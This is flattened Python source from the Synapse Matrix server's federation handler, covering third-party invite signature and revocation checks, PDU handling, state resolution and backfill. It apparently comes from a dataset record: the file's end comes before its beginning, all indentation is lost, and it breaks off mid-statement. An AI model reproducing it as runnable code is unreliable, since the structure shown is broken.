# though the sender isn't a local user.
event.internal_metadata.send_on_behalf_of = get_domain_from_id(event.sender)
# We retrieve the room member handler here as to not cause a cyclic dependency
member_handler = self.hs.get_room_member_handler()
await member_handler.send_membership_event(None, event, context)
async def add_display_name_to_third_party_invite(
self, room_version, event_dict, event, context
):
key = (
EventTypes.ThirdPartyInvite,
event.content["third_party_invite"]["signed"]["token"],
)
original_invite = None
prev_state_ids = await context.get_prev_state_ids()
original_invite_id = prev_state_ids.get(key)
if original_invite_id:
original_invite = await self.store.get_event(
original_invite_id, allow_none=True
)
if original_invite:
# If the m.room.third_party_invite event's content is empty, it means the
# invite has been revoked. In this case, we don't have to raise an error here
# because the auth check will fail on the invite (because it's not able to
# fetch public keys from the m.room.third_party_invite event's content, which
# is empty).
display_name = original_invite.content.get("display_name")
event_dict["content"]["third_party_invite"]["display_name"] = display_name
else:
logger.info(
"Could not find invite event for third_party_invite: %r", event_dict
)
# We don't discard here as this is not the appropriate place to do
# auth checks. If we need the invite and don't have it then the
# auth check code will explode appropriately.
builder = self.event_builder_factory.new(room_version, event_dict)
EventValidator().validate_builder(builder)
event, context = await self.event_creation_handler.create_new_client_event(
builder=builder
)
EventValidator().validate_new(event, self.config)
return (event, context)
async def _check_signature(self, event, context):
"""
Checks that the signature in the event is consistent with its invite.
Args:
event (Event): The m.room.member event to check
context (EventContext):
Raises:
AuthError: if signature didn't match any keys, or key has been
revoked,
SynapseError: if a transient error meant a key couldn't be checked
for revocation.
"""
signed = event.content["third_party_invite"]["signed"]
token = signed["token"]
prev_state_ids = await context.get_prev_state_ids()
invite_event_id = prev_state_ids.get((EventTypes.ThirdPartyInvite, token))
invite_event = None
if invite_event_id:
invite_event = await self.store.get_event(invite_event_id, allow_none=True)
if not invite_event:
raise AuthError(403, "Could not find invite")
logger.debug("Checking auth on event %r", event.content)
last_exception = None # type: Optional[Exception]
# for each public key in the 3pid invite event
for public_key_object in self.hs.get_auth().get_public_keys(invite_event):
try:
# for each sig on the third_party_invite block of the actual invite
for server, signature_block in signed["signatures"].items():
for key_name, encoded_signature in signature_block.items():
if not key_name.startswith("ed25519:"):
continue
logger.debug(
"Attempting to verify sig with key %s from %r "
"against pubkey %r",
key_name,
server,
public_key_object,
)
try:
public_key = public_key_object["public_key"]
verify_key = decode_verify_key_bytes(
key_name, decode_base64(public_key)
)
verify_signed_json(signed, server, verify_key)
logger.debug(
"Successfully verified sig with key %s from %r "
"against pubkey %r",
key_name,
server,
public_key_object,
)
except Exception:
logger.info(
"Failed to verify sig with key %s from %r "
"against pubkey %r",
key_name,
server,
public_key_object,
)
raise
try:
if "key_validity_url" in public_key_object:
await self._check_key_revocation(
public_key, public_key_object["key_validity_url"]
)
except Exception:
logger.info(
"Failed to query key_validity_url %s",
public_key_object["key_validity_url"],
)
raise
return
except Exception as e:
last_exception = e
if last_exception is None:
# we can only get here if get_public_keys() returned an empty list
# TODO: make this better
raise RuntimeError("no public key in invite event")
raise last_exception
async def _check_key_revocation(self, public_key, url):
"""
Checks whether public_key has been revoked.
Args:
public_key (str): base-64 encoded public key.
url (str): Key revocation URL.
Raises:
AuthError: if they key has been revoked.
SynapseError: if a transient error meant a key couldn't be checked
for revocation.
"""
try:
response = await self.http_client.get_json(url, {"public_key": public_key})
except Exception:
raise SynapseError(502, "Third party certificate could not be checked")
if "valid" not in response or not response["valid"]:
raise AuthError(403, "Third party certificate was invalid")
async def persist_events_and_notify(
self,
room_id: str,
event_and_contexts: Sequence[Tuple[EventBase, EventContext]],
backfilled: bool = False,
) -> int:
"""Persists events and tells the notifier/pushers about them, if
necessary.
Args:
room_id: The room ID of events being persisted.
event_and_contexts: Sequence of events with their associated
context that should be persisted. All events must belong to
the same room.
backfilled: Whether these events are a result of
backfilling or not
"""
instance = self.config.worker.events_shard_config.get_instance(room_id)
if instance != self._instance_name:
result = await self._send_events(
instance_name=instance,
store=self.store,
room_id=room_id,
event_and_contexts=event_and_contexts,
backfilled=backfilled,
)
return result["max_stream_id"]
else:
assert self.storage.persistence
# Note that this returns the events that were persisted, which may not be
# the same as were passed in if some were deduplicated due to transaction IDs.
events, max_stream_token = await self.storage.persistence.persist_events(
event_and_contexts, backfilled=backfilled
)
if self._ephemeral_messages_enabled:
for event in events:
# If there's an expiry timestamp on the event, schedule its expiry.
self._message_handler.maybe_schedule_expiry(event)
if not backfilled: # Never notify for backfilled events
for event in events:
await self._notify_persisted_event(event, max_stream_token)
return max_stream_token.stream
async def _notify_persisted_event(
self, event: EventBase, max_stream_token: RoomStreamToken
) -> None:
"""Checks to see if notifier/pushers should be notified about the
event or not.
Args:
event:
max_stream_id: The max_stream_id returned by persist_events
"""
extra_users = []
if event.type == EventTypes.Member:
target_user_id = event.state_key
# We notify for memberships if its an invite for one of our
# users
if event.internal_metadata.is_outlier():
if event.membership != Membership.INVITE:
if not self.is_mine_id(target_user_id):
return
target_user = UserID.from_string(target_user_id)
extra_users.append(target_user)
elif event.internal_metadata.is_outlier():
return
# the event has been persisted so it should have a stream ordering.
assert event.internal_metadata.stream_ordering
event_pos = PersistedEventPosition(
self._instance_name, event.internal_metadata.stream_ordering
)
self.notifier.on_new_room_event(
event, event_pos, max_stream_token, extra_users=extra_users
)
async def _clean_room_for_join(self, room_id: str) -> None:
"""Called to clean up any data in DB for a given room, ready for the
server to join the room.
Args:
room_id
"""
if self.config.worker_app:
await self._clean_room_for_join_client(room_id)
else:
await self.store.clean_room_for_join(room_id)
async def get_room_complexity(
self, remote_room_hosts: List[str], room_id: str
) -> Optional[dict]:
"""
Fetch the complexity of a remote room over federation.
Args:
remote_room_hosts (list[str]): The remote servers to ask.
room_id (str): The room ID to ask about.
Returns:
Dict contains the complexity
metric versions, while None means we could not fetch the complexity.
"""
for host in remote_room_hosts:
res = await self.federation_client.get_room_complexity(host, room_id)
# We got a result, return it.
if res:
return res
# We fell off the bottom, couldn't get the complexity from anyone. Oh
# well.
return None
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2017-2018 New Vector Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains handlers for federation events."""
import itertools
import logging
from collections.abc import Container
from http import HTTPStatus
from typing import TYPE_CHECKING, Dict, Iterable, List, Optional, Sequence, Tuple, Union
import attr
from signedjson.key import decode_verify_key_bytes
from signedjson.sign import verify_signed_json
from unpaddedbase64 import decode_base64
from twisted.internet import defer
from synapse import event_auth
from synapse.api.constants import (
EventTypes,
Membership,
RejectedReason,
RoomEncryptionAlgorithms,
)
from synapse.api.errors import (
AuthError,
CodeMessageException,
Codes,
FederationDeniedError,
FederationError,
HttpResponseException,
NotFoundError,
RequestSendFailed,
SynapseError,
)
from synapse.api.room_versions import KNOWN_ROOM_VERSIONS, RoomVersion, RoomVersions
from synapse.crypto.event_signing import compute_event_signature
from synapse.event_auth import auth_types_for_event
from synapse.events import EventBase
from synapse.events.snapshot import EventContext
from synapse.events.validator import EventValidator
from synapse.handlers._base import BaseHandler
from synapse.http.servlet import assert_params_in_dict
from synapse.logging.context import (
make_deferred_yieldable,
nested_logging_context,
preserve_fn,
run_in_background,
)
from synapse.logging.utils import log_function
from synapse.metrics.background_process_metrics import run_as_background_process
from synapse.replication.http.devices import ReplicationUserDevicesResyncRestServlet
from synapse.replication.http.federation import (
ReplicationCleanRoomRestServlet,
ReplicationFederationSendEventsRestServlet,
ReplicationStoreRoomOnOutlierMembershipRestServlet,
)
from synapse.state import StateResolutionStore
from synapse.storage.databases.main.events_worker import EventRedactBehaviour
from synapse.types import (
JsonDict,
MutableStateMap,
PersistedEventPosition,
RoomStreamToken,
StateMap,
UserID,
get_domain_from_id,
)
from synapse.util.async_helpers import Linearizer, concurrently_execute
from synapse.util.retryutils import NotRetryingDestination
from synapse.util.stringutils import shortstr
from synapse.visibility import filter_events_for_server
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
@attr.s(slots=True)
class _NewEventInfo:
"""Holds information about a received event, ready for passing to _handle_new_events
Attributes:
event: the received event
state: the state at that event
auth_events: the auth_event map for that event
"""
event = attr.ib(type=EventBase)
state = attr.ib(type=Optional[Sequence[EventBase]], default=None)
auth_events = attr.ib(type=Optional[MutableStateMap[EventBase]], default=None)
class FederationHandler(BaseHandler):
"""Handles events that originated from federation.
Responsible for:
a) handling received Pdus before handing them on as Events to the rest
of the homeserver (including auth and state conflict resolutions)
b) converting events that were produced by local clients that may need
to be sent to remote homeservers.
c) doing the necessary dances to invite remote users and join remote
rooms.
"""
def __init__(self, hs: "HomeServer"):
super().__init__(hs)
self.hs = hs
self.store = hs.get_datastore()
self.storage = hs.get_storage()
self.state_store = self.storage.state
self.federation_client = hs.get_federation_client()
self.state_handler = hs.get_state_handler()
self._state_resolution_handler = hs.get_state_resolution_handler()
self.server_name = hs.hostname
self.keyring = hs.get_keyring()
self.action_generator = hs.get_action_generator()
self.is_mine_id = hs.is_mine_id
self.spam_checker = hs.get_spam_checker()
self.event_creation_handler = hs.get_event_creation_handler()
self._message_handler = hs.get_message_handler()
self._server_notices_mxid = hs.config.server_notices_mxid
self.config = hs.config
self.http_client = hs.get_proxied_blacklisted_http_client()
self._instance_name = hs.get_instance_name()
self._replication = hs.get_replication_data_handler()
self._send_events = ReplicationFederationSendEventsRestServlet.make_client(hs)
self._clean_room_for_join_client = ReplicationCleanRoomRestServlet.make_client(
hs
)
if hs.config.worker_app:
self._user_device_resync = ReplicationUserDevicesResyncRestServlet.make_client(
hs
)
self._maybe_store_room_on_outlier_membership = ReplicationStoreRoomOnOutlierMembershipRestServlet.make_client(
hs
)
else:
self._device_list_updater = hs.get_device_handler().device_list_updater
self._maybe_store_room_on_outlier_membership = (
self.store.maybe_store_room_on_outlier_membership
)
# When joining a room we need to queue any events for that room up.
# For each room, a list of (pdu, origin) tuples.
self.room_queues = {} # type: Dict[str, List[Tuple[EventBase, str]]]
self._room_pdu_linearizer = Linearizer("fed_room_pdu")
self.third_party_event_rules = hs.get_third_party_event_rules()
self._ephemeral_messages_enabled = hs.config.enable_ephemeral_messages
async def on_receive_pdu(self, origin, pdu, sent_to_us_directly=False) -> None:
""" Process a PDU received via a federation /send/ transaction, or
via backfill of missing prev_events
Args:
origin (str): server which initiated the /send/ transaction. Will
be used to fetch missing events or state.
pdu (FrozenEvent): received PDU
sent_to_us_directly (bool): True if this event was pushed to us; False if
we pulled it as the result of a missing prev_event.
"""
room_id = pdu.room_id
event_id = pdu.event_id
logger.info("handling received PDU: %s", pdu)
# We reprocess pdus when we have seen them only as outliers
existing = await self.store.get_event(
event_id, allow_none=True, allow_rejected=True
)
# FIXME: Currently we fetch an event again when we already have it
# if it has been marked as an outlier.
already_seen = existing and (
not existing.internal_metadata.is_outlier()
or pdu.internal_metadata.is_outlier()
)
if already_seen:
logger.debug("[%s %s]: Already seen pdu", room_id, event_id)
return
# do some initial sanity-checking of the event. In particular, make
# sure it doesn't have hundreds of prev_events or auth_events, which
# could cause a huge state resolution or cascade of event fetches.
try:
self._sanity_check_event(pdu)
except SynapseError as err:
logger.warning(
"[%s %s] Received event failed sanity checks", room_id, event_id
)
raise FederationError("ERROR", err.code, err.msg, affected=pdu.event_id)
# If we are currently in the process of joining this room, then we
# queue up events for later processing.
if room_id in self.room_queues:
logger.info(
"[%s %s] Queuing PDU from %s for now: join in progress",
room_id,
event_id,
origin,
)
self.room_queues[room_id].append((pdu, origin))
return
# If we're not in the room just ditch the event entirely. This is
# probably an old server that has come back and thinks we're still in
# the room (or we've been rejoined to the room by a state reset).
#
# Note that if we were never in the room then we would have already
# dropped the event, since we wouldn't know the room version.
is_in_room = await self.auth.check_host_in_room(room_id, self.server_name)
if not is_in_room:
logger.info(
"[%s %s] Ignoring PDU from %s as we're not in the room",
room_id,
event_id,
origin,
)
return None
state = None
# Get missing pdus if necessary.
if not pdu.internal_metadata.is_outlier():
# We only backfill backwards to the min depth.
min_depth = await self.get_min_depth_for_context(pdu.room_id)
logger.debug("[%s %s] min_depth: %d", room_id, event_id, min_depth)
prevs = set(pdu.prev_event_ids())
seen = await self.store.have_events_in_timeline(prevs)
if min_depth is not None and pdu.depth < min_depth:
# This is so that we don't notify the user about this
# message, to work around the fact that some events will
# reference really really old events we really don't want to
# send to the clients.
pdu.internal_metadata.outlier = True
elif min_depth is not None and pdu.depth > min_depth:
missing_prevs = prevs - seen
if sent_to_us_directly and missing_prevs:
# If we're missing stuff, ensure we only fetch stuff one
# at a time.
logger.info(
"[%s %s] Acquiring room lock to fetch %d missing prev_events: %s",
room_id,
event_id,
len(missing_prevs),
shortstr(missing_prevs),
)
with (await self._room_pdu_linearizer.queue(pdu.room_id)):
logger.info(
"[%s %s] Acquired room lock to fetch %d missing prev_events",
room_id,
event_id,
len(missing_prevs),
)
try:
await self._get_missing_events_for_pdu(
origin, pdu, prevs, min_depth
)
except Exception as e:
raise Exception(
"Error fetching missing prev_events for %s: %s"
% (event_id, e)
) from e
# Update the set of things we've seen after trying to
# fetch the missing stuff
seen = await self.store.have_events_in_timeline(prevs)
if not prevs - seen:
logger.info(
"[%s %s] Found all missing prev_events",
room_id,
event_id,
)
if prevs - seen:
# We've still not been able to get all of the prev_events for this event.
#
# In this case, we need to fall back to asking another server in the
# federation for the state at this event. That's ok provided we then
# resolve the state against other bits of the DAG before using it (which
# will ensure that you can't just take over a room by sending an event,
# withholding its prev_events, and declaring yourself to be an admin in
# the subsequent state request).
#
# Now, if we're pulling this event as a missing prev_event, then clearly
# this event is not going to become the only forward-extremity and we are
# guaranteed to resolve its state against our existing forward
# extremities, so that should be fine.
#
# On the other hand, if this event was pushed to us, it is possible for
# it to become the only forward-extremity in the room, and we would then
# trust its state to be the state for the whole room. This is very bad.
# Further, if the event was pushed to us, there is no excuse for us not to
# have all the prev_events. We therefore reject any such events.
#
# XXX this really feels like it could/should be merged with the above,
# but there is an interaction with min_depth that I'm not really
# following.
if sent_to_us_directly:
logger.warning(
"[%s %s] Rejecting: failed to fetch %d prev events: %s",
room_id,
event_id,
len(prevs - seen),
shortstr(prevs - seen),
)
raise FederationError(
"ERROR",
403,
(
"Your server isn't divulging details about prev_events "
"referenced in this event."
),
affected=pdu.event_id,
)
logger.info(
"Event %s is missing prev_events: calculating state for a "
"backwards extremity",
event_id,
)
# Calculate the state after each of the previous events, and
# resolve them to find the correct state at the current event.
event_map = {event_id: pdu}
try:
# Get the state of the events we know about
ours = await self.state_store.get_state_groups_ids(room_id, seen)
# state_maps is a list of mappings from (type, state_key) to event_id
state_maps = list(ours.values()) # type: List[StateMap[str]]
# we don't need this any more, let's delete it.
del ours
# Ask the remote server for the states we don't
# know about
for p in prevs - seen:
logger.info(
"Requesting state at missing prev_event %s", event_id,
)
with nested_logging_context(p):
# note that if any of the missing prevs share missing state or
# auth events, the requests to fetch those events are deduped
# by the get_pdu_cache in federation_client.
(remote_state, _,) = await self._get_state_for_room(
origin, room_id, p, include_event_in_state=True
)
remote_state_map = {
(x.type, x.state_key): x.event_id for x in remote_state
}
state_maps.append(remote_state_map)
for x in remote_state:
event_map[x.event_id] = x
room_version = await self.store.get_room_version_id(room_id)
state_map = await self._state_resolution_handler.resolve_events_with_store(
room_id,
room_version,
state_maps,
event_map,
state_res_store=StateResolutionStore(self.store),
)
# We need to give _process_received_pdu the actual state events
# rather than event ids, so generate that now.
# First though we need to fetch all the events that are in
# state_map, so we can build up the state below.
evs = await self.store.get_events(
list(state_map.values()),
get_prev_content=False,
redact_behaviour=EventRedactBehaviour.AS_IS,
)
event_map.update(evs)
state = [event_map[e] for e in state_map.values()]
except Exception:
logger.warning(
"[%s %s] Error attempting to resolve state at missing "
"prev_events",
room_id,
event_id,
exc_info=True,
)
raise FederationError(
"ERROR",
403,
"We can't get valid state history.",
affected=event_id,
)
await self._process_received_pdu(origin, pdu, state=state)
async def _get_missing_events_for_pdu(self, origin, pdu, prevs, min_depth):
"""
Args:
origin (str): Origin of the pdu. Will be called to get the missing events
pdu: received pdu
prevs (set(str)): List of event ids which we are missing
min_depth (int): Minimum depth of events to return.
"""
room_id = pdu.room_id
event_id = pdu.event_id
seen = await self.store.have_events_in_timeline(prevs)
if not prevs - seen:
return
latest_list = await self.store.get_latest_event_ids_in_room(room_id)
# We add the prev events that we have seen to the latest
# list to ensure the remote server doesn't give them to us
latest = set(latest_list)
latest |= seen
logger.info(
"[%s %s]: Requesting missing events between %s and %s",
room_id,
event_id,
shortstr(latest),
event_id,
)
# XXX: we set timeout to 10s to help workaround
# https://github.com/matrix-org/synapse/issues/1733.
# The reason is to avoid holding the linearizer lock
# whilst processing inbound /send transactions, causing
# FDs to stack up and block other inbound transactions
# which empirically can currently take up to 30 minutes.
#
# N.B. this explicitly disables retry attempts.
#
# N.B. this also increases our chances of falling back to
# fetching fresh state for the room if the missing event
# can't be found, which slightly reduces our security.
# it may also increase our DAG extremity count for the room,
# causing additional state resolution? See #1760.
# However, fetching state doesn't hold the linearizer lock
# apparently.
#
# see https://github.com/matrix-org/synapse/pull/1744
#
# ----
#
# Update richvdh 2018/09/18: There are a number of problems with timing this
# request out aggressively on the client side:
#
# - it plays badly with the server-side rate-limiter, which starts tarpitting you
# if you send too many requests at once, so you end up with the server carefully
# working through the backlog of your requests, which you have already timed
# out.
#
# - for this request in particular, we now (as of
# https://github.com/matrix-org/synapse/pull/3456) reject any PDUs where the
# server can't produce a plausible-looking set of prev_events - so we becone
# much more likely to reject the event.
#
# - contrary to what it says above, we do *not* fall back to fetching fresh state
# for the room if get_missing_events times out. Rather, we give up processing
# the PDU whose prevs we are missing, which then makes it much more likely that
# we'll end up back here for the *next* PDU in the list, which exacerbates the
# problem.
#
# - the aggressive 10s timeout was introduced to deal with incoming federation
# requests taking 8 hours to process. It's not entirely clear why that was going
# on; certainly there were other issues causing traffic storms which are now
# resolved, and I think in any case we may be more sensible about our locking
# now. We're *certainly* more sensible about our logging.
#
# All that said: Let's try increasing the timeout to 60s and see what happens.
try:
missing_events = await self.federation_client.get_missing_events(
origin,
room_id,
earliest_events_ids=list(latest),
latest_events=[pdu],
limit=10,
min_depth=min_depth,
timeout=60000,
)
except (RequestSendFailed, HttpResponseException, NotRetryingDestination) as e:
# We failed to get the missing events, but since we need to handle
# the case of `get_missing_events` not returning the necessary
# events anyway, it is safe to simply log the error and continue.
logger.warning(
"[%s %s]: Failed to get prev_events: %s", room_id, event_id, e
)
return
logger.info(
"[%s %s]: Got %d prev_events: %s",
room_id,
event_id,
len(missing_events),
shortstr(missing_events),
)
# We want to sort these by depth so we process them and
# tell clients about them in order.
missing_events.sort(key=lambda x: x.depth)
for ev in missing_events:
logger.info(
"[%s %s] Handling received prev_event %s",
room_id,
event_id,
ev.event_id,
)
with nested_logging_context(ev.event_id):
try:
await self.on_receive_pdu(origin, ev, sent_to_us_directly=False)
except FederationError as e:
if e.code == 403:
logger.warning(
"[%s %s] Received prev_event %s failed history check.",
room_id,
event_id,
ev.event_id,
)
else:
raise
async def _get_state_for_room(
self,
destination: str,
room_id: str,
event_id: str,
include_event_in_state: bool = False,
) -> Tuple[List[EventBase], List[EventBase]]:
"""Requests all of the room state at a given event from a remote homeserver.
Args:
destination: The remote homeserver to query for the state.
room_id: The id of the room we're interested in.
event_id: The id of the event we want the state at.
include_event_in_state: if true, the event itself will be included in the
returned state event list.
Returns:
A list of events in the state, possibly including the event itself, and
a list of events in the auth chain for the given event.
"""
(
state_event_ids,
auth_event_ids,
) = await self.federation_client.get_room_state_ids(
destination, room_id, event_id=event_id
)
desired_events = set(state_event_ids + auth_event_ids)
if include_event_in_state:
desired_events.add(event_id)
event_map = await self._get_events_from_store_or_dest(
destination, room_id, desired_events
)
failed_to_fetch = desired_events - event_map.keys()
if failed_to_fetch:
logger.warning(
"Failed to fetch missing state/auth events for %s %s",
event_id,
failed_to_fetch,
)
remote_state = [
event_map[e_id] for e_id in state_event_ids if e_id in event_map
]
if include_event_in_state:
remote_event = event_map.get(event_id)
if not remote_event:
raise Exception("Unable to get missing prev_event %s" % (event_id,))
if remote_event.is_state() and remote_event.rejected_reason is None:
remote_state.append(remote_event)
auth_chain = [event_map[e_id] for e_id in auth_event_ids if e_id in event_map]
auth_chain.sort(key=lambda e: e.depth)
return remote_state, auth_chain
async def _get_events_from_store_or_dest(
self, destination: str, room_id: str, event_ids: Iterable[str]
) -> Dict[str, EventBase]:
"""Fetch events from a remote destination, checking if we already have them.
Persists any events we don't already have as outliers.
If we fail to fetch any of the events, a warning will be logged, and the event
will be omitted from the result. Likewise, any events which turn out not to
be in the given room.
This function *does not* automatically get missing auth events of the
newly fetched events. Callers must include the full auth chain of
of the missing events in the `event_ids` argument, to ensure that any
missing auth events are correctly fetched.
Returns:
map from event_id to event
"""
fetched_events = await self.store.get_events(event_ids, allow_rejected=True)
missing_events = set(event_ids) - fetched_events.keys()
if missing_events:
logger.debug(
"Fetching unknown state/auth events %s for room %s",
missing_events,
room_id,
)
await self._get_events_and_persist(
destination=destination, room_id=room_id, events=missing_events
)
# we need to make sure we re-load from the database to get the rejected
# state correct.
fetched_events.update(
(await self.store.get_events(missing_events, allow_rejected=True))
)
# check for events which were in the wrong room.
#
# this can happen if a remote server claims that the state or
# auth_events at an event in room A are actually events in room B
bad_events = [
(event_id, event.room_id)
for event_id, event in fetched_events.items()
if event.room_id != room_id
]
for bad_event_id, bad_room_id in bad_events:
# This is a bogus situation, but since we may only discover it a long time
# after it happened, we try our best to carry on, by just omitting the
# bad events from the returned auth/state set.
logger.warning(
"Remote server %s claims event %s in room %s is an auth/state "
"event in room %s",
destination,
bad_event_id,
bad_room_id,
room_id,
)
del fetched_events[bad_event_id]
return fetched_events
async def _process_received_pdu(
self, origin: str, event: EventBase, state: Optional[Iterable[EventBase]],
):
""" Called when we have a new pdu. We need to do auth checks and put it
through the StateHandler.
Args:
origin: server sending the event
event: event to be persisted
state: Normally None, but if we are handling a gap in the graph
(ie, we are missing one or more prev_events), the resolved state at the
event
"""
room_id = event.room_id
event_id = event.event_id
logger.debug("[%s %s] Processing event: %s", room_id, event_id, event)
try:
await self._handle_new_event(origin, event, state=state)
except AuthError as e:
raise FederationError("ERROR", e.code, e.msg, affected=event.event_id)
# For encrypted messages we check that we know about the sending device,
# if we don't then we mark the device cache for that user as stale.
if event.type == EventTypes.Encrypted:
device_id = event.content.get("device_id")
sender_key = event.content.get("sender_key")
cached_devices = await self.store.get_cached_devices_for_user(event.sender)
resync = False # Whether we should resync device lists.
device = None
if device_id is not None:
device = cached_devices.get(device_id)
if device is None:
logger.info(
"Received event from remote device not in our cache: %s %s",
event.sender,
device_id,
)
resync = True
# We also check if the `sender_key` matches what we expect.
if sender_key is not None:
# Figure out what sender key we're expecting. If we know the
# device and recognize the algorithm then we can work out the
# exact key to expect. Otherwise check it matches any key we
# have for that device.
current_keys = [] # type: Container[str]
if device:
keys = device.get("keys", {}).get("keys", {})
if (
event.content.get("algorithm")
== RoomEncryptionAlgorithms.MEGOLM_V1_AES_SHA2
):
# For this algorithm we expect a curve25519 key.
key_name = "curve25519:%s" % (device_id,)
current_keys = [keys.get(key_name)]
else:
# We don't know understand the algorithm, so we just
# check it matches a key for the device.
current_keys = keys.values()
elif device_id:
# We don't have any keys for the device ID.
pass
else:
# The event didn't include a device ID, so we just look for
# keys across all devices.
current_keys = [
key
for device in cached_devices.values()
for key in device.get("keys", {}).get("keys", {}).values()
]
# We now check that the sender key matches (one of) the expected
# keys.
if sender_key not in current_keys:
logger.info(
"Received event from remote device with unexpected sender key: %s %s: %s",
event.sender,
device_id or "<no device_id>",
sender_key,
)
resync = True
if resync:
run_as_background_process(
"resync_device_due_to_pdu", self._resync_device, event.sender
)
async def _resync_device(self, sender: str) -> None:
"""We have detected that the device list for the given user may be out
of sync, so we try and resync them.
"""
try:
await self.store.mark_remote_user_device_cache_as_stale(sender)
# Immediately attempt a resync in the background
if self.config.worker_app:
await self._user_device_resync(user_id=sender)
else:
await self._device_list_updater.user_device_resync(sender)
except Exception:
logger.exception("Failed to resync device for %s", sender)
@log_function
async def backfill(self, dest, room_id, limit, extremities):
""" Trigger a backfill request to `dest` for the given `room_id`
This will attempt to get more events from the remote. If the other side
has no new events to offer, this will return an empty list.
As the events are received, we check their signatures, and also do some
sanity-checking on them. If any of the backfilled events are invalid,
this method throws a SynapseError.
TODO: make this more useful to distinguish failures of the remote
server from invalid events (there is probably no point in trying to
re-fetch invalid events from every other HS in the room.)
"""
if dest == self.server_name:
raise SynapseError(400, "Can't backfill from self.")
events = await self.federation_client.backfill(
dest, room_id, limit=limit, extremities=extremities
)
if not events:
return []
# ideally we'd sanity check the events here for excess prev_events etc,
# but it's hard to reject events at this point without completely
# breaking backfill in the same way that it is currently broken by
# events whose signature we cannot verify (#3121).
#
# So for now we accept the events anyway. #3124 tracks this.
#
# for ev in events:
# self._sanity_check_event(ev)
# Don't bother processing events we already have.
seen_events = await self.store.have_events_in_timeline(
{e.event_id for e in events}
)
events = [e for e in events if e.event_id not in seen_events]
if not events:
return []
event_map = {e.event_id: e for e in events}
event_ids = {e.event_id for e in events}
# build a list of events whose prev_events weren't in the batch.
# (XXX: this will include events whose prev_events we already have; that doesn't
# sound right?)
edges = [ev.event_id for ev in events if set(ev.prev_event_ids()) - event_ids]
logger.info("backfill: Got %d events with %d edges", len(events), len(edges))
# For each edge get the current state.
auth_events = {}
state_events = {}
events_to_state = {}
for e_id in edges:
state, auth = await self._get_state_for_room(
destination=dest,
room_id=room_id,
event_id=e_id,
include_event_in_state=False,
)
auth_events.update({a.event_id: a for a in auth})
auth_events.update({s.event_id: s for s in state})
state_events.update({s.event_id: s for s in state})
events_to_state[e_id] = state
required_auth = {
a_id
for event in events
+ list(state_events.values())
+ list(auth_events.values())
for a_id in event.auth_event_ids()
}
auth_events.update(
{e_id: event_map[e_id] for e_id in required_auth if e_id in event_map}
)
ev_infos = []
# Step 1: persist the events in the chunk we fetched state for (i.e.
# the backwards extremities), with custom auth events and state
for e_id in events_to_state:
# For paranoia we ensure that these events are marked as
# non-outliers
ev = event_map[e_id]
assert not ev.internal_metadata.is_outlier()
ev_infos.append(
_NewEventInfo(
event=ev,
state=events_to_state[e_id],
auth_events={
(
auth_events[a_id].type,
auth_events[a_id].state_key,
): auth_events[a_id]
for a_id in ev.auth_event_ids()
if a_id in auth_events
},
)
)
if ev_infos:
await self._handle_new_events(dest, room_id, ev_infos, backfilled=True)
# Step 2: Persist the rest of the events in the chunk one by one
events.sort(key=lambda e: e.depth)
for event in events:
if event in events_to_state:
continue
# For paranoia we ensure that these events are marked as
# non-outliers
assert not event.internal_metadata.is_outlier()
# We store these one at a time since each event depends on the
# previous to work out the state.
# TODO: We can probably do something more clever here.
await self._handle_new_event(dest, event, backfilled=True)
return events
async def maybe_backfill(
self, room_id: str, current_depth: int, limit: int
) -> bool:
"""Checks the database to see if we should backfill before paginating,
and if so do.
Args:
room_id
current_depth: The depth from which we're paginating from. This is
used to decide if we should backfill and what extremities to
use.
limit: The number of events that the pagination request will
return. This is used as part of the heuristic to decide if we
should back paginate.
"""
extremities = await self.store.get_oldest_events_with_depth_in_room(room_id)
if not extremities:
logger.debug("Not backfilling as no extremeties found.")
return False
# We only want to paginate if we can actually see the events we'll get,
# as otherwise we'll just spend a lot of resources to get redacted
# events.
#
# We do this by filtering all the backwards extremities and seeing if
# any remain. Given we don't have the extremity events themselves, we
# need to actually check the events that reference them.
#
# *Note*: the spec wants us to keep backfilling until we reach the start
# of the room in case we are allowed to see some of the history. However
# in practice that causes more issues than its worth, as a) its
# relatively rare for there to be any visible history and b) even when
# there is its often sufficiently long ago that clients would stop
# attempting to paginate before backfill reached the visible history.
#
# TODO: If we do do a backfill then we should filter the backwards
# extremities to only include those that point to visible portions of
# history.
#
# TODO: Correctly handle the case where we are allowed to see the
# forward event but not the backward extremity, e.g. in the case of
# initial join of the server where we are allowed to see the join
# event but not anything before it. This would require looking at the
# state *before* the event, ignoring the special casing certain event
# types have.
forward_events = await self.store.get_successor_events(list(extremities))
extremities_events = await self.store.get_events(
forward_events,
redact_behaviour=EventRedactBehaviour.AS_IS,
get_prev_content=False,
)
# We set `check_history_visibility_only` as we might otherwise get false
# positives from users having been erased.
filtered_extremities = await filter_events_for_server(
self.storage,
self.server_name,
list(extremities_events.values()),
redact=False,
check_history_visibility_only=True,
)
if not filtered_extremities:
return False
# Check if we reached a point where we should start backfilling.
sorted_extremeties_tuple = sorted(extremities.items(), key=lambda e: -int(e[1]))
max_depth = sorted_extremeties_tuple[0][1]
# If we're approaching an extremity we trigger a backfill, otherwise we
# no-op.
#
# We chose twice the limit here as then clients paginating backwards
# will send pagination requests that trigger backfill at least twice
# using the most recent extremity before it gets removed (see below). We
# chose more than one times the limit in case of failure, but choosing a
# much larger factor will result in triggering a backfill request much
# earlier than necessary.
if current_depth - 2 * limit > max_depth:
logger.debug(
"Not backfilling as we don't need to. %d < %d - 2 * %d",
max_depth,
current_depth,
limit,
)
return False
logger.debug(
"room_id: %s, backfill: current_depth: %s, max_depth: %s, extrems: %s",
room_id,
current_depth,
max_depth,
sorted_extremeties_tuple,
)
# We ignore extremities that have a greater depth than our current depth
# as:
# 1. we don't really care about getting events that have happened
# before our current position; and
# 2. we have likely previously tried and failed to backfill from that
# extremity, so to avoid getting "stuck" requesting the same
# backfill repeatedly we drop those extremities.
filtered_sorted_extremeties_tuple = [
